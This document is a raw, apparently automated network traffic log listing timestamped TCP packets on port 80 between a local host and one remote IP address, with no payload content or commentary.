                                      Sep 25, 2024 18:33:53.328120947 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328136921 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328154087 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328169107 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328185081 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328188896 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328188896 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328198910 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328213930 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328227997 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328243017 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328243017 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328917980 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328933954 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328949928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328965902 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328978062 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328978062 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.328980923 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.328996897 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329011917 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329019070 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329029083 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329044104 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329060078 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329073906 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329090118 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329090118 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329090118 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329133034 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329217911 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329603910 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329619884 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329634905 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329651117 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329668045 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329684019 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329698086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329706907 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329706907 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329706907 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.329715967 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.329777956 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.358362913 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.394541979 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394582033 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394603014 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394620895 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394639969 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394659042 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394658089 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.394673109 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.394682884 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394869089 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394896030 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394902945 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.394902945 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.394931078 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394965887 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.394985914 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.395062923 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.395095110 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.395147085 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.395153999 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.395183086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.395241976 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413166046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413263083 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413268089 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413307905 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413398027 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413430929 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413443089 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413465023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413501978 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413511992 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413537025 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413554907 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413650036 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413683891 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413691998 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413856983 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413899899 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.413908005 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413939953 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.413973093 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414011002 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414019108 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414045095 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414062023 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414077997 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414109945 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414141893 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414170027 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414175034 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414213896 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414237976 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414383888 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414644957 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414679050 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414711952 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414732933 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414743900 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414779902 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414805889 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414812088 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414845943 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414876938 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.414879084 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414911032 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414949894 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.414963961 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415055037 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415329933 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415363073 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415420055 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415443897 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415477037 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415510893 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415550947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415551901 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415585041 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415616989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415626049 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415651083 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.415678978 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.415990114 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416023970 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416058064 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416095018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416129112 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416161060 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416193962 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416194916 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416194916 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416227102 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416259050 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416260958 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416290045 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416322947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416335106 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416356087 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416388988 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416414976 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416521072 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416781902 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416834116 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416867018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416898966 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416914940 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416935921 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.416956902 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.416969061 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417001963 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417036057 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417058945 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417068005 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417100906 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417114019 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417134047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417166948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417190075 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417200089 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417217970 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417233944 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417294979 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417663097 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417725086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417768002 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417824030 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417857885 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417872906 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417891026 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417924881 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417937040 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.417958021 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417992115 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.417995930 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418025017 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418056965 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418057919 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418087959 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418088913 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418118954 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418122053 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418128014 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418716908 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418751001 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418771029 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418785095 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418818951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418833017 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418857098 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418890953 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418921947 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418941021 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.418956041 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.418992043 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419006109 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.419025898 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419059038 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419091940 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419097900 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.419097900 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.419125080 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419225931 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.419481993 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419518948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.419718027 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.427740097 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.484955072 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.484981060 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485002041 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485028982 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485044003 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485059023 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485075951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485105038 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485222101 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485408068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485490084 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485502958 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485527039 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485585928 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485604048 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485615969 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485630989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485646963 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485660076 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485661983 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485677004 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485691071 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.485702038 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.485781908 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.503731012 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503751040 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503772020 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503814936 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503829956 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503849030 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.503938913 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.503941059 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503956079 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503972054 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.503987074 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504005909 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504017115 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504139900 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504154921 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504168987 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504271984 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504303932 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504303932 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504347086 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504362106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504385948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504400969 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504415035 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504436016 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504467010 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504715919 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504729986 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504745007 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504760027 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504771948 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.504775047 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.504928112 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505080938 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505095005 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505111933 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505127907 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505142927 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505142927 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505158901 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505175114 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505196095 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505199909 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505199909 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505439997 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505548000 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505563974 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505579948 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505606890 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505774975 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505789042 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505804062 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505817890 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505832911 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505847931 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505855083 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505855083 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505862951 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505877018 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505894899 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505897999 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505897999 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505916119 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.505924940 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.505932093 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506010056 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506577969 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506592989 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506608009 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506623030 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506638050 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506650925 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506659031 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506674051 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506689072 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506694078 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506694078 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506705046 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506720066 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506736040 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506738901 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506752014 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506767035 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506779909 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.506791115 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506791115 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.506817102 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507476091 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507492065 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507505894 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507522106 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507535934 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507550001 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507554054 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507564068 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507580996 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507580996 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507581949 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507596016 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507611036 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507623911 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507637978 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507639885 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507639885 CEST4969980192.168.2.7172.94.3.25
                                      Sep 25, 2024 18:33:53.507652998 CEST8049699172.94.3.25192.168.2.7
                                      Sep 25, 2024 18:33:53.507719040 CEST4969980192.168.2.7172.94.3.25
